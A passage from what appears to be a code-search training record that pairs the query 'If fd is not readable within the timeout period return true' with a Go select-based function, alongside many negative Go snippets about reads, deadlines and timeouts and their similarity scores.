{\n\t\tr1, _, err = r.r.ReadRune()\n\t\tif err == nil {\n\t\t\tif r1 != '\\n' {\n\t\t\t\tr.r.UnreadRune()\n\t\t\t\tr1 = '\\r'\n\t\t\t}\n\t\t}\n\t}\n\tr.column++\n\treturn r1, err\n}", "func TestInstructionReadDelayTimer(t *testing.T) {\n\tchipCfg := GetDefaultConfig()\n\tchip, _, _ := NewCHIP8(chipCfg)\n\n\tchip.RegDelay = 0xba\n\tchip.WriteShort(0x200, 0xf107)\n\n\tchip.StepEmulation()\n\n\tif chip.Reg[0x1] != 0xba {\n\t\tt.Errorf(\"chip.Reg[0x1] = 0x%x; want 0xba\", chip.Reg[0x1])\n\t}\n}", "func TestUDPReadTimeout(t *testing.T) {\n\tla, err := ResolveUDPAddr(\"udp4\", \"127.0.0.1:0\")\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tc, err := ListenUDP(\"udp4\", la)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tdefer c.Close()\n\n\tc.SetDeadline(time.Now())\n\tb := make([]byte, 1)\n\tn, addr, err := c.ReadFromUDP(b)\n\tif !errors.Is(err, os.ErrDeadlineExceeded) {\n\t\tt.Errorf(\"ReadFromUDP got err %v want os.ErrDeadlineExceeded\", err)\n\t}\n\tif n != 0 {\n\t\tt.Errorf(\"ReadFromUDP got n %d want 0\", n)\n\t}\n\tif addr != nil {\n\t\tt.Errorf(\"ReadFromUDP got addr %+#v want nil\", addr)\n\t}\n}", "func (c *Conn) readLine() (string, error) {\n\tif c.server.ReadTimeout != 0 {\n\t\tif err := c.conn.SetReadDeadline(time.Now().Add(c.server.ReadTimeout)); err != nil {\n\t\t\treturn \"\", err\n\t\t}\n\t}\n\n\treturn c.text.ReadLine()\n}", "func TestRead(t *testing.T) {\n\tmockTr := new(mockTTransport)\n\treads := make(chan []byte, 2)\n\treads <- frame[0:4]\n\treads <- frame[4:]\n\tclose(reads)\n\tmockTr.reads = reads\n\ttr := NewTFramedTransport(mockTr)\n\tmockTr.On(\"Read\", make([]byte, 4096)).Return(4, nil).Once()\n\tmockTr.On(\"Read\", append(frame[0:4], make([]byte, 4092)...)).Return(len(frame), nil).Once()\n\n\tbuff := make([]byte, len(frame)-4)\n\tn, err := tr.Read(buff)\n\n\tassert.Nil(t, err)\n\tassert.Equal(t, len(frame)-4, n)\n\tassert.Equal(t, frame[4:], buff)\n}", "func read(ch <-chan []byte) ([]byte, bool) {\n\tselect {\n\tcase msg, ok := <-ch:\n\t\tif !ok {\n\t\t\t// channel was closed\n\t\t\treturn nil, true\n\t\t}\n\t\treturn msg, false\n\tdefault:\n\t\treturn nil, false\n\t}\n}", "func (c *udpListenerConn) Read(byt []byte) (int, error) {\n\tvar buf []byte\n\tvar ok bool\n\n\tif !c.readDeadline.IsZero() {\n\t\treadTimer := time.NewTimer(c.readDeadline.Sub(time.Now()))\n\t\tdefer readTimer.Stop()\n\n\t\tselect {\n\t\tcase <-readTimer.C:\n\t\t\treturn 0, udpErrorTimeout\n\t\tcase buf, ok = <-c.read:\n\t\t}\n\t} else {\n\t\tbuf, ok = <-c.read\n\t}\n\n\tif ok == false {\n\t\treturn 0, udpErrorTerminated\n\t}\n\n\tcopy(byt, buf)\n\tc.listener.readDone <- struct{}{}\n\treturn len(buf), nil\n}", "func (t *TorControl) DialTimeout(network, addr string, timeoutMillis int) error {\n\tvar err error = nil\n\tt.controlConn, err = net.DialTimeout(network, addr, time.Duration(timeoutMillis)*time.Millisecond)\n\tif err != nil {\n\t\treturn err\n\t}\n\treader := bufio.NewReader(t.controlConn)\n\tt.textprotoReader = textproto.NewReader(reader)\n\treturn nil\n}", "func (dev *Device) Recv() ([]byte, error) {\n\tvar recv []byte\n\tselect {\n\tcase recv = <-dev.chRecv:\n\tcase <-time.After(dev.timeout):\n\t}\n\tif recv == nil || len(recv) <= 0 {\n\t\treturn nil, fmt.Errorf(\"timeout error in Recv command, %w\", smartcard.ErrComm)\n\t}\n\treturn recv[:], nil\n}", "func readByte(r io.Reader) (ret byte, err error) {\n\tvar be [1]byte\n\tvalBytes := be[0:1]\n\n\tif _, err = io.ReadFull(r, valBytes); err != nil {\n\t\treturn 0, err\n\t}\n\n\treturn valBytes[0], nil\n}", "func (r *devReader) Read(b []byte) (n int, err error) {\n\t// if atomic.CompareAndSwapInt32(&r.used, 0, 1) {\n\t// \t// First use of randomness. Start timer to warn about\n\t// \t// being blocked on entropy not being available.\n\t// \tt := time.AfterFunc(60*time.Second, warnBlocked)\n\t// \tdefer t.Stop()\n\t// }\n\t// if altGetRandom != nil && r.name == urandomDevice && altGetRandom(b) {\n\t// \treturn len(b), nil\n\t// }\n\n\tr.mu.Lock()\n\tdefer r.mu.Unlock()\n\n\tif r.f == nil {\n\t\tf, err := os.Open(r.name)\n\t\tif f == nil {\n\t\t\treturn 0, err\n\t\t}\n\n\t\tif runtime.GOOS == \"plan9\" {\n\t\t\tr.f = f\n\t\t} else {\n\t\t\tr.f = bufio.NewReader(hideAgainReader{f})\n\t\t}\n\t}\n\n\treturn r.f.Read(b)\n}", "func (c *Client) recv(timeout time.Duration) (rsp *Response, err error) {\n\tif c.state == Closed {\n\t\treturn nil, io.EOF\n\t} else if c.rch == nil && (timeout < 0 || c.cch == nil) {\n\t\trsp, err = c.next()\n\t} else {\n\t\tif c.rch == nil {\n\t\t\trch := make(chan *response, 1)\n\t\t\tc.cch <- rch\n\t\t\tc.rch = rch\n\t\t\truntime.Gosched()\n\t\t}\n\t\tvar r *response\n\t\tif timeout < 0 {\n\t\t\tr = <-c.rch\n\t\t} else {\n\t\t\tselect {\n\t\t\tcase r = <-c.rch:\n\t\t\tdefault:\n\t\t\t\tif timeout == 0 {\n\t\t\t\t\treturn nil, ErrTimeout\n\t\t\t\t}\n\t\t\t\tselect {\n\t\t\t\tcase r = <-c.rch:\n\t\t\t\tcase <-time.After(timeout):\n\t\t\t\t\treturn nil, ErrTimeout\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tc.rch = nil\n\t\trsp, err = r.rsp, r.err\n\t}\n\tif err == nil {\n\t\tc.update(rsp)\n\t} else if rsp == nil {\n\t\tdefer c.setState(Closed)\n\t\tif err != io.EOF {\n\t\t\tc.close(\"protocol error\")\n\t\t} else if err = c.close(\"end of stream\"); err == nil {\n\t\t\terr = io.EOF\n\t\t}\n\t}\n\treturn\n}", "func (rd *Reader) readOne() (core.Any, error) {\n\tif err := rd.SkipSpaces(); err != nil {\n\t\treturn nil, err\n\t}\n\n\tr, err := rd.NextRune()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif unicode.IsNumber(r) {\n\t\treturn rd.numReader(rd, r)\n\t} else if r == '+' || r == '-' {\n\t\tr2, err := rd.NextRune()\n\t\tif err != nil && err != io.EOF {\n\t\t\treturn nil, err\n\t\t}\n\n\t\tif err != io.EOF {\n\t\t\trd.Unread(r2)\n\t\t\tif unicode.IsNumber(r2) {\n\t\t\t\treturn rd.numReader(rd, r)\n\t\t\t}\n\t\t}\n\t}\n\n\tmacro, found := rd.macros[r]\n\tif found {\n\t\treturn macro(rd, r)\n\t}\n\n\tif r == dispatchTrigger {\n\t\tf, err := rd.execDispatch()\n\t\tif f != nil || err != nil {\n\t\t\treturn f, err\n\t\t}\n\t}\n\n\treturn rd.symReader(rd, r)\n}", "func serialTraceRead(context *Context) (data []byte, err error) {\n\n\t// Exit if not open\n\tif !context.portIsOpen {\n\t\treturn data, fmt.Errorf(\"port not open \" + note.ErrCardIo)\n\t}\n\n\t// Do the read\n\tvar length int\n\tbuf := make([]byte, 2048)\n\treadBeganMs = int(time.Now().UnixNano() / 1000000)\n\tlength, err = context.serialPort.Read(buf)\n\treadElapsedMs := int(time.Now().UnixNano()/1000000) - readBeganMs\n\tif false {\n\t\tfmt.Printf(\"mon: elapsed:%d len:%d err:%s '%s'\\n\", readElapsedMs, length, err, string(buf[:length]))\n\t}\n\tif readElapsedMs == 0 && length == 0 && err == io.EOF {\n\t\t// On Linux, hardware port failures come back simply as immediate EOF\n\t\terr = fmt.Errorf(\"hardware failure\")\n\t}\n\tif readElapsedMs == 0 && length == 0 {\n\t\t// On Linux, sudden unplug comes back simply as immediate ''\n\t\terr = fmt.Errorf(\"hardware unplugged or rebooted probably\")\n\t}\n\tif err != nil {\n\t\tif err == io.EOF {\n\t\t\t// Just a read timeout\n\t\t\treturn data, nil\n\t\t}\n\t\treturn data, fmt.Errorf(\"%s %s\", err, note.ErrCardIo)\n\t}\n\n\treturn buf[:length], nil\n\n}", "func (f stdioFileHandle) Read(b []byte) (n int, err error) {\n\tif len(b) == 0 {\n\t\treturn 0, nil\n\t}\n\n\tsize := buffered()\n\tfor size == 0 {\n\t\tgosched()\n\t\tsize = buffered()\n\t}\n\n\tif size > len(b) {\n\t\tsize = len(b)\n\t}\n\tfor i := 0; i < size; i++ {\n\t\tb[i] = getchar()\n\t}\n\treturn size, nil\n}", "func (ts *testSystem) serverTryRead(size int, expectedData []byte) {\n\tvar q struct{}\n\tts.t.Logf(\"server starts to read...\")\n\t_, data, err := ts.server.Read()\n\tif err != nil {\n\t\tts.t.Fatalf(\"Server received error during read.\")\n\t\treturn\n\t}\n\n\tswitch size {\n\tcase SHORT:\n\t\t//fmt.Printf(\"WRONG!! Server received short message: %s\\n\", data)\n\t\tfmt.Printf(\"expected data: %s, size: %d\\n\", expectedData, size)\n\t\tts.t.Fatalf(\"Server received short message: %s\\n\", data)\n\t\treturn\n\tcase LONG:\n\t\tts.exitChan <- q\n\t\tif len(data) != len(expectedData) {\n\t\t\tts.t.Fatalf(\"Expecting data %s, server received longer message: %s\",\n\t\t\t\texpectedData, data)\n\t\t}\n\t\treturn\n\tcase NORMAL:\n\t\tts.exitChan <- q\n\t\tif !bytes.Equal(data, expectedData) {\n\t\t\tts.t.Fatalf(\"Expecting %s, server received message: %s\",\n\t\t\t\texpectedData, data)\n\t\t}\n\t\treturn\n\t}\n}", "func DialTimeout(timeout time.Duration) (net.Conn, error) {\n\t// Compute the path to the pipe name record.\n\tpipeNameRecordPath, err := subpath(pipeNameRecordName)\n\tif err != nil {\n\t\treturn nil, errors.Wrap(err, \"unable to compute pipe name record path\")\n\t}\n\n\t// Read the pipe name.\n\tpipeNameBytes, err := ioutil.ReadFile(pipeNameRecordPath)\n\tif err != nil {\n\t\treturn nil, errors.Wrap(err, \"unable to read pipe name\")\n\t}\n\tpipeName := string(pipeNameBytes)\n\n\t// Convert the timeout duration to a pointer. The go-winio library uses a\n\t// pointer-based duration to indicate the absence of a timeout. This sort of\n\t// flies in the face of convention (in the net package, a zero-value\n\t// duration indicates no timeout), but we can adapt.\n\tvar timeoutPointer *time.Duration\n\tif timeout != 0 {\n\t\ttimeoutPointer = &timeout\n\t}\n\n\t// Attempt to connect.\n\treturn winio.DialPipe(pipeName, timeoutPointer)\n}", "func (ts *testSystem) clientTryRead(size int, expectedData []byte) {\n\tvar q struct{}\n\tts.t.Logf(\"client starts to read...\")\n\tdata, err := ts.clients[0].Read()\n\tif err != nil {\n\t\tprint(err.Error())\n\t\tts.t.Fatalf(\"Client received error during read.\")\n\t\treturn\n\t}\n\n\tswitch size {\n\tcase SHORT:\n\t\tprint(\"size: \", size)\n\t\tts.t.Fatalf(\"Client received short message!\")\n\t\treturn\n\tcase LONG:\n\t\tts.exitChan <- q\n\t\tif len(data) != len(expectedData) {\n\t\t\tts.t.Fatalf(\"Expecting shorter data %s, client received longer message: %s\",\n\t\t\t\texpectedData, data)\n\t\t}\n\t\treturn\n\tcase NORMAL:\n\t\tts.exitChan <- q\n\t\tif !bytes.Equal(data, expectedData) {\n\t\t\tts.t.Fatalf(\"Expecting %s, client received message: %s\",\n\t\t\t\texpectedData, data)\n\t\t}\n\t\treturn\n\t}\n}", "func TestExactReadCloserShort(t *testing.T) {\n\tbuf := bytes.NewBuffer(make([]byte, 5))\n\trc := NewExactReadCloser(&readerNilCloser{buf}, 10)\n\tif _, err := rc.Read(make([]byte, 10)); err != nil {\n\t\tt.Fatalf(\"Read expected nil err, got %v\", err)\n\t}\n\tif err := rc.Close(); err != ErrShortRead {\n\t\tt.Fatalf(\"Close expected %v, got %v\", ErrShortRead, err)\n\t}\n}", "func TestReadByByte(t *testing.T) {\n\trun.skipIfNoFUSE(t)\n\n\tvar data = []byte(\"hellohello\")\n\trun.createFile(t, \"testfile\", string(data))\n\trun.checkDir(t, \"testfile 10\")\n\n\tfor i := 0; i < len(data); i++ {\n\t\tfd, err := os.Open(run.path(\"testfile\"))\n\t\tassert.NoError(t, err)\n\t\tfor j := 0; j < i; j++ {\n\t\t\tbuf := make([]byte, 1)\n\t\t\tn, err := io.ReadFull(fd, buf)\n\t\t\tassert.NoError(t, err)\n\t\t\tassert.Equal(t, 1, n)\n\t\t\tassert.Equal(t, buf[0], data[j])\n\t\t}\n\t\terr = fd.Close()\n\t\tassert.NoError(t, err)\n\t}\n\n\trun.rm(t, \"testfile\")\n}", "func (suite *RunePartTestSuite) TestReadTo1ByteBuffer() {\n\tpart := runePart{runeVal: 'a'}\n\tbuff := make([]byte, 1, 1)\n\tcount, err := part.Read(buff)\n\tsuite.Nil(err)\n\tsuite.Equal(1, count)\n\tsuite.Equal(\"a\", string(buff))\n}", "func (rc *CryptoReadCloser) Read(b []byte) (int, error) {\n\tif rc.isClosed {\n\t\treturn 0, io.EOF\n\t}\n\treturn rc.Decrypter.Read(b)\n}", "func (pipe *slimPipe) Read(buffer []byte) (int, error) {\n\terrChannel := make(chan error)\n\tcountChannel := make(chan int)\n\tgo func() {\n\t\treadBytes, err := io.ReadAtLeast(pipe.reader, buffer, 1)\n\t\tif err != nil {\n\t\t\terrChannel <- err\n\t\t} else {\n\t\t\tcountChannel <- readBytes\n\t\t}\n\t\tclose(errChannel)\n\t\tclose(countChannel)\n\t}()\n\tselect {\n\tcase count := <-countChannel:\n\t\treturn count, nil\n\tcase err := <-errChannel:\n\t\treturn 0, err\n\tcase <-time.After(pipe.timeout):\n\t\treturn 0, fmt.Errorf(\"Timeout (%v)\", pipe.timeout)\n\t}\n}", "func (o *Content) GetReadTimeout() int32 {\n\tif o == nil || o.ReadTimeout.Get() == nil {\n\t\tvar ret int32\n\t\treturn ret\n\t}\n\treturn *o.ReadTimeout.Get()\n}", "func (p *pipe) read(b []byte) (int, error) {\n\t// Short circuit if the output was already closed\n\tselect {\n\tcase <-p.outQuit:\n\t\treturn 0, ErrClosedPipe\n\tdefault:\n\t}\n\t// Wait until some data becomes available\n\tsafeFree, err := p.outputWait()\n\tif err != nil {\n\t\treturn 0, err\n\t}\n\t// Retrieve as much as available\n\tlimit := p.outPos + p.size - safeFree\n\tif limit > p.size {\n\t\tlimit = p.size\n\t}\n\tif limit > p.outPos+int32(len(b)) {\n\t\tlimit = p.outPos + int32(len(b))\n\t}\n\twritten := copy(b, p.buffer[p.outPos:limit])\n\n\t// Update the pipe output state and return\n\tp.outputAdvance(written)\n\treturn written, nil\n}", "func (jbobject *JavaNioCharBuffer) Read(a JavaNioCharBufferInterface) (int, error) {\n\tconv_a := javabind.NewGoToJavaCallable()\n\tif err := conv_a.Convert(a); err != nil {\n\t\tpanic(err)\n\t}\n\tjret, err := jbobject.CallMethod(javabind.GetEnv(), \"read\", javabind.Int, conv_a.Value().Cast(\"java/nio/CharBuffer\"))\n\tif err != nil {\n\t\tvar zero int\n\t\treturn zero, err\n\t}\n\tconv_a.CleanUp()\n\treturn jret.(int), nil\n}", "func read(c1 chan byte, fh *os.File) {\n\t//creating a slice of byte who can hold only 1 byte\n\tdata := make([]byte, 1)\n\tfor {\n\t\t_, err := fh.Read(data)\n\t\t//EOF or other error ?, close channel and exit for loop.\n\t\tif err != nil {\n\t\t\tclose(c1)\n\t\t\twg.Done()\n\t\t\tbreak\n\t\t}\n\n\t\t//since the data buffer is only 1 byte, we read only the first index of the slice\n\t\tc1 <- data[0]\n\n\t\t//fmt.Print(string(data))\n\t}\n}", "func (c *Client) ReadOrQuery(k uint64, t time.Duration) (float64, error) {\n\tv, err := c.Read(k)\n\tif err == nil {\n\t\treturn v, nil\n\t}\n\n\tl := make(chan float64, 1)\n\n\tc.m.Lock()\n\tc.o[k] = append(c.o[k], l)\n\tc.m.Unlock()\n\n\tif err := types.WriteMessage(c.s, types.QueryMessage{Key: k}); err != nil {\n\t\treturn 0, err\n\t}\n\n\tselect {\n\tcase v := <-l:\n\t\treturn v, nil\n\tcase <-time.After(t):\n\t\treturn 0, ErrTimeout\n\t}\n}" ]
[ "0.6527407", "0.6354455", "0.62314177", "0.60235244", "0.59406394", "0.5750943", "0.56235766", "0.56235766", "0.5595832", "0.5575077", "0.55733573", "0.5528142", "0.55023915", "0.5498631", "0.54959285", "0.5492799", "0.54909766", "0.5408234", "0.5406413", "0.53877175", "0.5375736", "0.53557503", "0.5327454", "0.5301282", "0.5278276", "0.5268466", "0.5267802", "0.52608454", "0.5239657", "0.5229675", "0.51158136", "0.51042855", "0.5103349", "0.51007634", "0.5073099", "0.5073099", "0.5064055", "0.5059438", "0.50552654", "0.50480676", "0.5047831", "0.5039341", "0.5037963", "0.5034673", "0.5031985", "0.50241035", "0.5021257", "0.5004861", "0.49916613", "0.4989395", "0.49867442", "0.49734366", "0.49334705", "0.49281856", "0.49229604", "0.49152812", "0.4913583", "0.49088803", "0.48991182", "0.48912376", "0.48887867", "0.4885567", "0.48854494", "0.4869287", "0.48553807", "0.48536798", "0.48517886", "0.483919", "0.48374102", "0.48374102", "0.4832552", "0.48291785", "0.48258683", "0.4817443", "0.48142734", "0.48093554", "0.48081034", "0.48060527", "0.48038247", "0.4800637", "0.47826937", "0.47753894", "0.47708407", "0.47693816", "0.47669137", "0.4753391", "0.47532088", "0.47467703", "0.4729694", "0.47233748", "0.47233102", "0.47100848", "0.4709856", "0.47088513", "0.4708815", "0.4698535", "0.46962208", "0.46807674", "0.46744674", "0.4672635" ]
0.66135055
0
If fd is not readable within the timeout period return true.
func wouldBlock(fd int, timeout *syscall.Timeval) bool { rd := syscall.FdSet{} fdset.Set(fd, &rd) n, err := syscall.Select(fd+1, &rd, nil, nil, timeout) if err != nil { log.Printf("select error %s\n", err) return false } return n == 0 }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func IsTimeout(err error) bool", "func (c *connection) locked_readOperationTimedOut(tq *timerQueue, cd *connectionData) bool {\n\treturn !c.readData.timeout.IsZero() && tq.Now().After(c.readData.timeout)\n}", "func (o *Content) HasReadTimeout() bool {\n\tif o != nil && o.ReadTimeout.IsSet() {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *Content) GetReadTimeoutOk() (*int32, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn o.ReadTimeout.Get(), o.ReadTimeout.IsSet()\n}", "func IsTimeoutErr(err error) bool {\n\tif sysErr, ok := err.(*os.SyscallError); ok {\n\t\tif errno, ok := sysErr.Err.(syscall.Errno); ok {\n\t\t\treturn errno == cERROR_TIMEOUT\n\t\t}\n\t}\n\treturn false\n}", "func (s *Signal) HasTimeout() bool {\n\treturn s.timeout != 0\n}", "func (t *Task) IsTimeout() bool {\n\treturn time.Now().Sub(t.AssignedAt) > TIMEOUT\n}", "func (worker *K8SPodWorker) IsTimeout() (bool, time.Duration) {\n\tnow := time.Now()\n\tif now.After(worker.dueTime) {\n\t\treturn true, time.Duration(0)\n\t}\n\treturn false, worker.dueTime.Sub(now)\n}", "func (n *notifier) hasFD(fd int32) bool {\n\tn.mu.Lock()\n\tdefer n.mu.Unlock()\n\n\t_, ok := n.fdMap[fd]\n\treturn ok\n}", "func IsTimeout(err error) bool {\n\treturn err == errTimeout\n}", "func (*TimeoutError) IsTimeout() bool {\n\treturn true\n}", "func (p *peerAddr) isExpired(timeout time.Duration, curTime time.Time) bool {\n\treturn curTime.Sub(p.lastPing.Value.(time.Time)) >= timeout\n}", "func (s *Server) isAlive(c net.Conn) bool {\n\tone := make([]byte, 1)\n\tif err := c.SetReadDeadline(time.Now().Add(time.Millisecond * 500)); err != nil {\n\t\tlog.Println(err)\n\n\t\treturn false\n\t}\n\n\t// client doesn't send anything, so it's fine to Read() instead of Peek()\n\tif _, err := c.Read(one); err == io.EOF {\n\t\treturn false\n\t}\n\n\treturn true\n}", "func (e *Exit) HasTimeout() bool {\n\treturn e.timeout != 0\n}", "func IsReadFailure(err error) bool {\n\treturn errors.Is(err, ErrRead)\n}", "func HasFD(fd int32) bool {\n\treturn shared.notifier.hasFD(fd)\n}", "func TestUDPReadTimeout(t *testing.T) {\n\tla, err := ResolveUDPAddr(\"udp4\", \"127.0.0.1:0\")\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tc, err := ListenUDP(\"udp4\", la)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tdefer c.Close()\n\n\tc.SetDeadline(time.Now())\n\tb := make([]byte, 1)\n\tn, addr, err := c.ReadFromUDP(b)\n\tif !errors.Is(err, os.ErrDeadlineExceeded) {\n\t\tt.Errorf(\"ReadFromUDP got err %v want os.ErrDeadlineExceeded\", err)\n\t}\n\tif n != 0 {\n\t\tt.Errorf(\"ReadFromUDP got n %d want 0\", n)\n\t}\n\tif addr != nil {\n\t\tt.Errorf(\"ReadFromUDP got addr %+#v want nil\", addr)\n\t}\n}", "func FileSetReadDeadline(f *os.File, t time.Time) error", "func (l *LimitListenerError) Timeout() bool { return true }", "func (p *McPinger) IsTimeoutZero() bool {\n\treturn p.Timeout == 0\n}", "func (this *SmtpWorker) TimeoutHasExpired(startTime time.Time) bool {\n\treturn int(time.Since(startTime).Seconds()) > smtpconstants.COMMAND_TIMEOUT_SECONDS\n}", "func IsTimeout(err error) bool {\n\ttype timeouter interface {\n\t\tTimeout() bool\n\t}\n\treturn isErrorPredicate(err, func(err error) bool {\n\t\te, ok := err.(timeouter)\n\t\treturn ok && e.Timeout()\n\t})\n}", "func (e *NotFoundError) Timeout() bool { return false }", "func (res ExecResult) TimedOut() bool {\n\treturn res.ExitType == TimedOut\n}", "func timeout(ms time.Duration) <-chan bool {\n\tch := make(chan bool, 1)\n\tgo func() {\n\t\ttime.Sleep(ms * time.Millisecond)\n\t\tch <- true\n\t}()\n\treturn ch\n}", "func DialReadTimeout(d time.Duration) DialOpt {\n\treturn func(do *dialOpts) {\n\t\tdo.readTimeout = d\n\t}\n}", "func (fdl *FDLimiter) LockOrTimeout(ns int64) error {\n\twaitsofar := int64(0)\n\tfor {\n\t\t// Try to get an fd\n\t\tfdl.lk.Lock()\n\t\tif fdl.count < fdl.limit {\n\t\t\tfdl.count++\n\t\t\tfdl.notify()\n\t\t\tfdl.lk.Unlock()\n\t\t\treturn nil\n\t\t}\n\t\tfdl.lk.Unlock()\n\n\t\t// Or, wait for an fd or timeout\n\t\tif waitsofar >= ns {\n\t\t\treturn ErrTimeout\n\t\t}\n\t\tt0 := time.Now().UnixNano()\n\t\talrm := alarmOnce(ns - waitsofar)\n\t\tselect {\n\t\tcase <-alrm:\n\t\tcase <-fdl.ch:\n\t\t}\n\t\twaitsofar += time.Now().UnixNano() - t0\n\t}\n\tpanic(\"FDLimiter, unreachable\")\n}", "func waitForPidfile(filename string) bool {\n\ttimeout := time.Duration(60) * time.Second\n\tcheckPeriod := time.Duration(100) * time.Millisecond\n\tfor loops := timeout/checkPeriod;utils.PathExists(filename) && loops > 0; loops-- {\n\t\ttime.Sleep(checkPeriod)\n\t}\t\n\treturn !utils.PathExists(filename)\n}", "func isClientTimeout(err error) bool {\n\tif uerr, ok := err.(*url.Error); ok {\n\t\tif nerr, ok := uerr.Err.(net.Error); ok && nerr.Timeout() {\n\t\t\treturn true\n\t\t}\n\t}\n\treturn false\n}", "func (exp *ControlleeExpectations) isExpired() bool {\n\treturn clock.RealClock{}.Since(exp.timestamp) > ExpectationsTimeout\n}", "func IsTimeout(err error) bool {\n\tif err == nil {\n\t\treturn false\n\t}\n\tif t, ok := errs.Cause(err).(timeout); ok {\n\t\treturn t.Timeout()\n\t}\n\treturn false\n}", "func (f *FakelogicalReader) ReadNotCalled() bool {\n\treturn len(f.ReadCalls) == 0\n}", "func (c *GameClient) HandleTimeout() bool {\r\n\t//\tc.conn.SetReadDeadline((time.Now().Add(5 * time.Second)))\r\n\t//\tglog.Error(\"HandleTimeout\")\r\n\t//return true\r\n\treturn false\r\n}", "func isReadLimitReached(bytesLoaded int64, linesLoaded int64, logFilePosition string) bool {\n\treturn (logFilePosition == logs.Beginning && bytesLoaded >= byteReadLimit) ||\n\t\t(logFilePosition == logs.End && linesLoaded >= lineReadLimit)\n}", "func (p *TBufferedReadTransport) IsOpen() bool {\n\treturn true\n}", "func readTimeout(c <-chan Event, ms uint) (Event, error) {\n\tselect {\n\tcase ev := <-c:\n\t\treturn ev, nil\n\tcase <-time.After(time.Duration(ms) * time.Millisecond):\n\t\treturn Event{}, errChanTimeout\n\t}\n}", "func IsTimeout(err error) bool {\n\tfor err != nil {\n\t\tif bterr, ok := err.(isTimeouter); ok {\n\t\t\treturn bterr.IsTimeout()\n\t\t}\n\n\t\tif cerr, ok := err.(causer); ok {\n\t\t\terr = cerr.Cause()\n\t\t}\n\t}\n\treturn false\n}", "func (c Config) ReadTimeoutOrDefault() time.Duration {\n\tif c.ReadTimeout > 0 {\n\t\treturn c.ReadTimeout\n\t}\n\treturn DefaultReadTimeout\n}", "func (peer *Peer) CanTry() bool {\n\t// Exponential backoff\n\tmod := (math.Exp2(float64(peer.RetryTimes)) - 1) * 5\n\tif mod == 0 {\n\t\treturn true\n\t}\n\n\t// Random time elapsed\n\tnow := utc.UnixNow()\n\tt := rnum.Int63n(int64(mod))\n\treturn now-peer.LastSeen > t\n}", "func (ep *ExportingProcess) checkConnToCollector(oneByteForRead []byte) bool {\n\tep.connToCollector.SetReadDeadline(time.Now().Add(time.Millisecond))\n\tif _, err := ep.connToCollector.Read(oneByteForRead); err == io.EOF {\n\t\treturn false\n\t}\n\treturn true\n}", "func (c Client) PollForDuration() bool {\n\treturn c.PollingMode == PollUntilDuration\n}", "func (e *ErrWaitServiceStableTimeout) Timeout() bool {\n\treturn true\n}", "func (hb *HeartBeatTracker) TimedOut(id string) bool {\n\thb.lock()\n\tt, ok := hb.last[id]\n\thb.unlock()\n\treturn !ok || time.Since(t) > hb.interval\n}", "func (o *out) IsOpen() bool {\n\treturn o.stream != nil\n}", "func (t *Timeout) isTimeout() bool {\n\tif time.Since(t.lastTime.Load().(time.Time)) <= t.timeGap {\n\t\treturn false\n\t}\n\n\tif t.autoUpdate {\n\t\tt.lastTime.Store(time.Now())\n\t}\n\treturn true\n}", "func (m *Manager) IsRead(thread string) bool {\n\tm.mutex.RLock()\n\tdefer m.mutex.RUnlock()\n\t_, exist := m.readThreads[thread]\n\treturn exist\n}", "func (s *settings) GetReadTimeout() time.Duration {\n\treturn s.rTimeout\n}", "func (hb *HeartBeatTracker) TimedOut(id string) bool {\n\thb.lock()\n\tdefer hb.unlock()\n\n\tt, ok := hb.last[id]\n\treturn !ok || time.Since(t) > hb.interval\n}", "func (c ReadChan) TryReceive() bool {\n\tselect {\n\tcase <-c:\n\t\treturn true\n\tdefault:\n\t\treturn false\n\t}\n}", "func (dev *Device) read() {\n\tif !dev.Ok {\n\t\t// log.Printf(\"Device is closed === %s\", dev)\n\t\treturn\n\t}\n\tdev.chRecv = make(chan []byte)\n\tgo func() {\n\t\tdefer func() {\n\t\t\tselect {\n\t\t\tcase _, ok := <-dev.chRecv:\n\t\t\t\tif !ok {\n\t\t\t\t\t// log.Println(\"=== chRecv closed ===\")\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\tdefault:\n\t\t\t}\n\t\t\tclose(dev.chRecv)\n\t\t\tlog.Println(\"finish read port\")\n\t\t}()\n\t\tcountError := 0\n\t\t//TODO timeoutRead?\n\t\tfuncerr := func(err error) error {\n\t\t\tif err == nil {\n\t\t\t\treturn nil\n\t\t\t}\n\t\t\tlog.Printf(\"funcread err: %s\", err)\n\t\t\tswitch {\n\t\t\tcase errors.Is(err, os.ErrClosed):\n\t\t\t\tdev.Ok = false\n\t\t\t\treturn err\n\t\t\tcase errors.Is(err, io.ErrClosedPipe):\n\t\t\t\tdev.Ok = false\n\t\t\t\treturn err\n\t\t\tcase errors.Is(err, io.EOF):\n\t\t\t\tif countError > 3 {\n\t\t\t\t\tif !dev.Ok {\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\t\t\t\t\tcountError = 0\n\t\t\t\t}\n\t\t\t\tcountError++\n\t\t\t}\n\n\t\t\treturn nil\n\n\t\t\t// if countError > 3 {\n\t\t\t// dev.Ok = false\n\t\t\t// return err\n\t\t\t// }\n\t\t\t// time.Sleep(1 * time.Second)\n\t\t\t// countError++\n\t\t\t// return nil\n\t\t}\n\t\tbf := bufio.NewReader(dev.port)\n\t\ttempb := make([]byte, 1024)\n\t\t// buff := make([]byte, 1)\n\t\tindxb := 0\n\t\tfor {\n\t\t\tif !dev.Ok {\n\t\t\t\t// log.Printf(\"Device is closed === %s ######\", dev)\n\t\t\t\treturn\n\t\t\t}\n\t\t\t// log.Println(\"0\")\n\t\t\t// if dev.mode != 0 {\n\t\t\t// \tline, _, err := bf.ReadLine()\n\t\t\t// \tif err != nil {\n\t\t\t// \t\tif err := funcerr(err); err != nil {\n\t\t\t// \t\t\treturn\n\t\t\t// \t\t}\n\t\t\t// \t\tcontinue\n\t\t\t// \t}\n\t\t\t// \tcountError = 0\n\t\t\t// \tselect {\n\t\t\t// \tcase <-dev.chQuit:\n\t\t\t// \t\treturn\n\t\t\t// \tcase dev.chRecv <- line:\n\t\t\t// \tcase <-time.After(1 * time.Second):\n\t\t\t// \t}\n\t\t\t// 